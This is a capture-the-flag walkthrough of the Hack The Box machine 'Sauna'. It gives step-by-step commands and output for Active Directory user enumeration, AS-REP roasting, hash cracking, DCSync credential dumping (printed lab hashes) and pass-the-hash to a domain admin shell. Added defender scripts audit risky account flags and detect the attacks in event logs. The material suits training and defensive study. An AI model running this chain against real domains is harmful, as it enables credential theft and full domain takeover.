HTB Walkthrough: Sauna w/o Metasploit (retired)

Shraddha M.
4 min read · May 24, 2021

Sauna is a retired box on HTB and is part of TJ Null’s OSCP-like boxes.

Hostname: Sauna | Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# nmap -sC -sV -oA Sauna 10.10.10.175
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-20 20:33 EDT
Nmap scan report for 10.10.10.175
Host is up (0.033s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-21 07:49:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h15m21s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-21T07:49:08
|_ start_date: N/A

Enumeration

┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# ldapsearch -h 10.10.10.175 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#

#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
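The base-scope query above only returns the naming contexts. With a bind account, the same tool exports every user object together with its userAccountControl attribute (`ldapsearch -x -H ldap://10.10.10.175 -D '<bind user>' -W -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' '(objectClass=user)' sAMAccountName userAccountControl`), and that export is what a defender reviews to find accounts exposed the way fsmith turns out to be later in this box. The script below is an added example written for this walkthrough, not part of the original post or of any tool it uses: it parses that LDIF output (the sample is constructed to resemble it, using only account names that appear on this box) and reports the risky userAccountControl bits.

```python
"""Audit an ldapsearch LDIF export for risky userAccountControl bits.

Added, hypothetical defender-side script (not from the original post).
Input is the LDIF printed by ldapsearch for a query like
  ldapsearch -x -H ldap://10.10.10.175 -D '<bind user>' -W \
    -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' '(objectClass=user)' \
    sAMAccountName userAccountControl
SAMPLE_LDIF below is constructed to resemble that output.
"""
import base64
from typing import Dict, List

# userAccountControl bit values (Microsoft ADS_USER_FLAG enumeration)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
}

# Bits worth a ticket, with the reason a reviewer should see
RISKY = {
    "DONT_REQ_PREAUTH": "AS-REP roastable: the KDC hands out a blob encrypted with the account key",
    "PASSWD_NOTREQD": "password policy bypass, empty password allowed",
    "TRUSTED_FOR_DELEGATION": "unconstrained delegation",
    "USE_DES_KEY_ONLY": "weak DES-only Kerberos keys",
}

# Constructed sample. 4260352 = 0x410200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH;
# one value is base64-encoded ('::') to exercise that LDIF form.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName userAccountControl
#

# Administrator, Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Administrator,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: Administrator
userAccountControl: 512

# Guest, Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Guest,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: Guest
userAccountControl: 66082

# HSmith, Users, EGOTISTICAL-BANK.LOCAL
dn: CN=HSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: HSmith
userAccountControl: 66048

# FSmith, Users, EGOTISTICAL-BANK.LOCAL
dn: CN=FSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName:: RlNtaXRo
userAccountControl: 4260352

# search result
search: 2
result: 0 Success
"""


def parse_ldif(text: str) -> List[Dict[str, str]]:
    """Parse LDIF into one {attribute: value} dict per entry.
    Handles '#' comments, folded continuation lines (leading space)
    and base64 values ('attr:: ...')."""
    logical: List[str] = []
    for raw in text.splitlines() + [""]:
        if raw.startswith(" ") and logical:      # continuation of the previous line
            logical[-1] += raw[1:]
            continue
        logical.append(raw)
    entries, current = [], {}
    for line in logical:
        if line.startswith("#"):
            continue
        if line == "":                            # blank line ends an entry
            if current:
                entries.append(current)
            current = {}
            continue
        attr, _, value = line.partition(":")
        value = value.strip()
        if value.startswith(":"):                 # '::' marks a base64 value
            value = base64.b64decode(value[1:].strip()).decode()
        current[attr] = value
    return entries


def decode_uac(value: int) -> List[str]:
    """Names of the known bits set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def audit(ldif_text: str) -> Dict[str, List[str]]:
    """Return {sAMAccountName: [risky flag names]}; disabled accounts are skipped
    because their flags only matter once they are re-enabled."""
    findings = {}
    for entry in parse_ldif(ldif_text):
        if "sAMAccountName" not in entry or "userAccountControl" not in entry:
            continue
        flags = decode_uac(int(entry["userAccountControl"]))
        if "ACCOUNTDISABLE" in flags:
            continue
        risky = [f for f in flags if f in RISKY]
        if risky:
            findings[entry["sAMAccountName"]] = risky
    return findings


if __name__ == "__main__":
    for account, flags in audit(SAMPLE_LDIF).items():
        for f in flags:
            print(f"{account}: {f} ({RISKY[f]})")
```

Run it against a real export and the fix for the first finding is a checkbox in the account properties: clearing "Do not require Kerberos preauthentication" removes the DONT_REQ_PREAUTH bit and closes the path used in the Exploitation section.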

Browsing to http://10.10.10.175/about.html reveals the names of employees. The tool ‘Username Anarchy’ turns those names into candidate usernames in common formats.

┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# ./username-anarchy --input-file /home/kali/labs/HTB/Sauna/username.txt --select-format first,flast,first.last,f.last,firstl > unames.txt

Looking for valid usernames with kerbrute, which checks each candidate against the KDC without locking accounts out:

┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# ./kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL /home/kali/labs/HTB/Sauna/unames.txt

Version: v1.0.3 (9dad6e1) - 05/22/21 - Ronnie Flathers @ropnop

2021/05/22 13:38:26 > Using KDC(s):
2021/05/22 13:38:26 > 10.10.10.175:88

2021/05/22 13:38:26 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2021/05/22 13:38:26 > Done! Tested 30 usernames (1 valid) in 0.071 seconds

Exploitation

Performing AS-REP Roasting. The account fsmith has Kerberos pre-authentication disabled, so the KDC returns an AS-REP encrypted with a key derived from his password to anyone who asks for it, and that blob can be cracked offline. To know more about the attack, please read: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat

┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/GetNPUsers.py -request -no-pass egotistical-bank.local/fsmith -dc-ip 10.10.10.175
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:806235bbd4d102dacbbc41dad93176ba$[rest of hash truncated]
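Both of the last two steps leave a distinct trace on the domain controller, in Security event 4768 ("A Kerberos authentication ticket (TGT) was requested"): kerbrute's user enumeration produces a burst of failures with status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one source address, and the GetNPUsers.py request shows up as a successful 4768 with PreAuthType 0 and an RC4 (0x17) ticket for an account that should never be logging on without pre-authentication. The detector below is an added example for this walkthrough, not part of the original post or of kerbrute or Impacket; the events, the source addresses and the guessed usernames are all constructed to mimic the fields a DC logs when "Audit Kerberos Authentication Service" is enabled.

```python
"""Spot Kerberos user enumeration and AS-REP roasting in Security event 4768.

Added defender-side example for this walkthrough (not from the original post
or from kerbrute/Impacket). SAMPLE_EVENTS is constructed to mimic the fields a
domain controller logs in 4768 when "Audit Kerberos Authentication Service"
is enabled.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# 4768 field values used below:
#   Status               0x0 success; 0x6 KDC_ERR_C_PRINCIPAL_UNKNOWN (no such user)
#   PreAuthType          0 = no pre-authentication; 2 = PA-ENC-TIMESTAMP
#   TicketEncryptionType 0x17 = RC4-HMAC; 0x12 = AES256; 0xffffffff = no ticket issued


def ev(ts: str, user: str, status: str, preauth: str, etype: str, ip: str) -> Dict:
    """One constructed 4768 record."""
    return {"TimeCreated": datetime.fromisoformat(ts), "EventID": 4768,
            "TargetUserName": user, "Status": status, "PreAuthType": preauth,
            "TicketEncryptionType": etype, "IpAddress": ip}


# Constructed guesses in the username-anarchy formats used above; not real accounts
GUESSES = ["jane", "jdoe", "jane.doe", "j.doe", "janed",
           "john", "jroe", "john.roe", "j.roe", "johnr", "bob", "bsmith"]

SAMPLE_EVENTS = [
    # a normal logon: pre-auth with AES keys
    ev("2021-05-22T13:30:00", "hsmith", "0x0", "2", "0x12", "10.10.10.50"),
    # twelve unknown principals from one host within one second: enumeration
    *[ev("2021-05-22T13:38:26", g, "0x6", "0", "0xffffffff", "10.10.14.3") for g in GUESSES],
    # a real account with pre-auth disabled gets an RC4 TGT with no proof of password
    ev("2021-05-22T13:40:01", "fsmith", "0x0", "0", "0x17", "10.10.14.3"),
]


def detect(events: List[Dict], window: timedelta = timedelta(minutes=5),
           threshold: int = 10) -> List[Dict]:
    """Return findings for enumeration bursts and AS-REP roastable TGT requests."""
    findings = []

    # 1. Username enumeration: a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN from one source
    unknown_by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"].lower() == "0x6":
            unknown_by_ip[e["IpAddress"]].append(e)
    for ip, evs in unknown_by_ip.items():
        evs.sort(key=lambda x: x["TimeCreated"])
        best, start = (0, 0, 0), 0                 # (count, start index, end index)
        for end in range(len(evs)):                # sliding window over sorted times
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, start, end)
        if best[0] >= threshold:
            names = sorted({x["TargetUserName"] for x in evs[best[1]:best[2] + 1]})
            findings.append({"type": "username_enumeration", "source": ip,
                             "count": best[0], "sample_names": names[:5]})

    # 2. AS-REP roasting: successful TGT with no pre-auth and an RC4 ticket
    for e in events:
        if (e["EventID"] == 4768 and e["Status"].lower() == "0x0"
                and str(e["PreAuthType"]) == "0"
                and e["TicketEncryptionType"].lower() == "0x17"):
            findings.append({"type": "asrep_roast", "source": e["IpAddress"],
                             "account": e["TargetUserName"]})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The second rule is the more reliable one: a 4768 with PreAuthType 0 and Status 0x0 only happens for accounts that have pre-authentication disabled, so in a domain where nobody should have that setting the rule needs no threshold at all. Note that a valid pre-auth-less account also answers the enumeration probe with a success, which is why the fsmith event above sits at the tail of the burst from the same source.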

Cracking the password from the extracted hash using hashcat (mode 18200 is Kerberos 5 AS-REP etype 23, matching the $krb5asrep$23$ prefix).

┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# hashcat -m 18200 hash.txt -a 0 /usr/share/wordlists/rockyou.txt

┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# hashcat -m 18200 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --show
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:806235bbd4d102dacbbc41dad93176ba$[rest of hash truncated]:<password>

From the nmap scan, WinRM was open on the target, so we log in with evil-winrm using the cracked password:
┌──(root💀kali)-[/home/kali/labs/HTB/opt]
└─# ruby evil-winrm.rb -u fsmith -p '<fsmith password>' -i 10.10.10.175

This gives a shell as fsmith and the user flag.

Privilege Escalation

Running winpeas.exe to enumerate the target, we find credentials for the ‘svc_loanmanager’ account. The actual domain username, however, is ‘svc_loanmgr’ (see the winpeas.exe results).

winpeas.exe result

Logging into the target with these credentials via evil-winrm gives a shell as svc_loanmgr. Next, BloodHound is used to enumerate Active Directory.

We can see that svc_loanmgr holds the replication rights (GetChanges and GetChangesAll) on the domain, which means it can perform DCSync.
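The right BloodHound shows here is also the thing to audit and to alert on: a DCSync request is a DRSUAPI replication call, and with "Audit Directory Service Access" enabled the DC records it as Security event 4662 on the domain head with the DS-Replication-Get-Changes extended rights in the Properties field. Legitimate replication is done by domain controllers' machine accounts, so any other principal exercising those rights is a finding. The detector below is an added example for this walkthrough, not code from the original post, BloodHound or Impacket; the events and the allow-list of expected replicators are constructed.

```python
"""Flag DCSync-style replication requests in Security event 4662.

Added defender-side example for this walkthrough (not from the original post
or from BloodHound/Impacket). SAMPLE_EVENTS is constructed to mimic the 4662
fields a DC logs when "Audit Directory Service Access" is enabled and the
domain head carries a SACL for Control Access.
"""
import re
from typing import Dict, List, Set

# Extended rights a DRSUAPI replication (DCSync) request needs; these are the
# documented control-access-right GUIDs
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals that are expected to replicate: the domain controllers' computer
# accounts (constructed allow-list; build a real one from the Domain Controllers OU)
EXPECTED_REPLICATORS: Set[str] = {"sauna$"}

GUID_RE = re.compile(r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})", re.I)
DOMAIN_HEAD = "DC=EGOTISTICAL-BANK,DC=LOCAL"


def ev(subject: str, obj: str, properties: str, access_mask: str = "0x100") -> Dict:
    """One constructed 4662 record; AccessMask 0x100 is Control Access."""
    return {"EventID": 4662, "SubjectUserName": subject,
            "SubjectDomainName": "EGOTISTICAL-BANK", "ObjectName": obj,
            "Properties": properties, "AccessMask": access_mask}


SAMPLE_EVENTS = [
    # routine inter-DC replication by the DC's own machine account
    ev("SAUNA$", DOMAIN_HEAD,
       "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # an ordinary property read on a user object (placeholder property GUID)
    ev("HSmith", "CN=HSmith,CN=Users," + DOMAIN_HEAD,
       "Read Property {00000000-0000-0000-0000-000000000000}", "0x10"),
    # a service account asking for both replication rights on the domain head
    ev("svc_loanmgr", DOMAIN_HEAD,
       "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
]


def detect_dcsync(events: List[Dict], expected: Set[str] = EXPECTED_REPLICATORS) -> List[Dict]:
    """Return one finding per 4662 Control Access event that exercises a replication
    right and does not come from an expected replicator."""
    findings = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"].lower() != "0x100":
            continue
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(e["Properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights:
            continue
        if e["SubjectUserName"].lower() in expected:
            continue                                  # DC-to-DC replication is expected
        findings.append({"subject": e["SubjectUserName"], "object": e["ObjectName"],
                         "rights": rights})
    return findings


if __name__ == "__main__":
    for finding in detect_dcsync(SAMPLE_EVENTS):
        print(finding)
```

The detection is the backstop; the fix is in the ACL on the domain object itself, where those two extended rights should be granted to nothing but Domain Controllers, Enterprise Domain Controllers and the built-in administrative groups. A periodic review of that ACL (BloodHound's DCSync edge is one convenient view of it) is what would have caught svc_loanmgr before it was abused.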

Performing DCSync with secretsdump.py:
┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:5330c786160c2a4a943fcd7e9d9335f9:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:bd55bcb00f0b11f9393aca05f42fbf6f2ec5800d3dc048f5c35e8aadd474815f
SAUNA$:aes128-cts-hmac-sha1-96:ea926c26504647e0ec5e27c98146e28e
SAUNA$:des-cbc-md5:6720bc86926d6e3d
[*] Cleaning up...

Passing the Administrator NT hash to psexec.py (pass-the-hash) gives a shell on the domain controller and the root flag.
┌──(root💀kali)-[/home/kali/labs/HTB/Sauna]
└─# python3 /home/kali/labs/HTB/opt/impacket-0.9.22/examples/psexec.py administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff
